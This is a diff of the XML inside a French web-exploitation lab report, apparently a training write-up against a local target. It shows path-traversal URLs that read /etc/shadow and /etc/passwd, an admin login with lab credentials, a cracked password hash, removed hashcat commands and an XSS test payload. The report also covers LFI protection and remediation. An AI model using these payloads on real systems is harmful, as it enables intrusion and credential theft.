--- a/LAB WebEX.docx
+++ b/LAB WebEX.docx
@@ -13,8 +13,6 @@
           <w:szCs w:val="40"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Hlk217032002"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -300,13 +298,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>19</w:t>
+        <w:t xml:space="preserve"> 19</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -433,19 +425,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">es </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>failles de sécurité</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> suivantes :</w:t>
+        <w:t>es failles de sécurité suivantes :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1209,9 +1189,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236B5107" wp14:editId="405B7C35">
-            <wp:extent cx="5760720" cy="1370965"/>
-            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236B5107" wp14:editId="235BE535">
+            <wp:extent cx="5695950" cy="1355551"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="155818383" name="Image 1" descr="Une image contenant texte, Police, ligne, nombre&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1232,7 +1212,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="1370965"/>
+                      <a:ext cx="5701767" cy="1356935"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1252,6 +1232,16 @@
         <w:ind w:left="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1305,11 +1295,42 @@
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se rendre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">ensuite </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">sur </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId16" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>https://crackstation.net/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pour cracker le hash :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1317,125 +1338,7 @@
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "437394baff5aa33daa618be47b75cb49" &gt; hash.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>hashcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -m 0 hash.txt /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>share</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>wordlists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>/rockyou.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
+          <w:noProof/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1444,10 +1347,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B340304" wp14:editId="256488F2">
-            <wp:extent cx="3562350" cy="304800"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46ED1299" wp14:editId="1E3849E0">
+            <wp:extent cx="5760720" cy="476250"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1956740461" name="Image 1"/>
+            <wp:docPr id="1050110758" name="Image 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1455,11 +1358,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1956740461" name=""/>
+                    <pic:cNvPr id="1050110758" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1467,7 +1370,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3562350" cy="304800"/>
+                      <a:ext cx="5760720" cy="476250"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1486,19 +1389,101 @@
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">Aller sur </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>http://192.168.10.22/admin/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">Taper </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>qwerty123@</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pour se connecter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F383A9E" wp14:editId="2AEDFC2C">
-            <wp:extent cx="5760720" cy="4131945"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F383A9E" wp14:editId="66EE9BD4">
+            <wp:extent cx="4926757" cy="3533775"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
             <wp:docPr id="1642227601" name="Image 1" descr="Une image contenant texte, Visage humain, capture d’écran, habits&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1511,7 +1496,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1519,7 +1504,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="4131945"/>
+                      <a:ext cx="4932761" cy="3538081"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1544,12 +1529,40 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Attaque LFI :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>http://192.168.10.22/.hidden/?page=../../../../etc/shadow</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
@@ -1574,7 +1587,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1597,6 +1610,120 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Les séquences</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/ permettent de remonter des répertoires. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Le fichier /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> est ciblé car il est lisible par tous les utilisateurs et confirme que l'on peut accéder au système des fichiers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Taper dans la barre de recherche WEB :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>http://192.168.10.22/?page=../../../../../../../etc/passwd</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1606,7 +1733,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BFBC989" wp14:editId="21EEDA69">
             <wp:extent cx="5337545" cy="1880967"/>
@@ -1623,7 +1749,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1716,16 +1842,7 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Protection contre les LFI (Local File Inclusion)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t> :</w:t>
+        <w:t>Protection contre les LFI (Local File Inclusion) :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2334,7 +2451,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -2363,7 +2480,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> =&gt; </w:t>
       </w:r>
-      <w:hyperlink r:id="rId21" w:history="1">
+      <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -2447,7 +2564,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788A666A" wp14:editId="0A24FFA5">
             <wp:extent cx="3306726" cy="2579188"/>
@@ -2464,7 +2580,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2514,7 +2630,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2643,54 +2759,33 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t xml:space="preserve">Il convient d’encoder </w:t>
-      </w:r>
+        <w:t>Il convient d’encoder &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>&lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>alert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>('XSS')&lt;/script&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> en base64 ce qui donne </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId24" w:history="1">
+        <w:t>('XSS')&lt;/script&gt; en base64 ce qui donne PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -2729,7 +2824,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2805,7 +2900,6 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>REMEDIATION</w:t>
       </w:r>
       <w:r>
@@ -3197,7 +3291,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId26" w:history="1">
+      <w:hyperlink r:id="rId30" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3234,7 +3328,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3276,7 +3370,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId28" w:history="1">
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3396,7 +3490,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3424,7 +3518,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId30" w:history="1">
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3461,7 +3555,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3545,7 +3639,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3640,7 +3734,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3753,7 +3847,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId38" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3791,7 +3885,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId39"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3952,7 +4046,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4056,7 +4150,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4134,7 +4228,7 @@
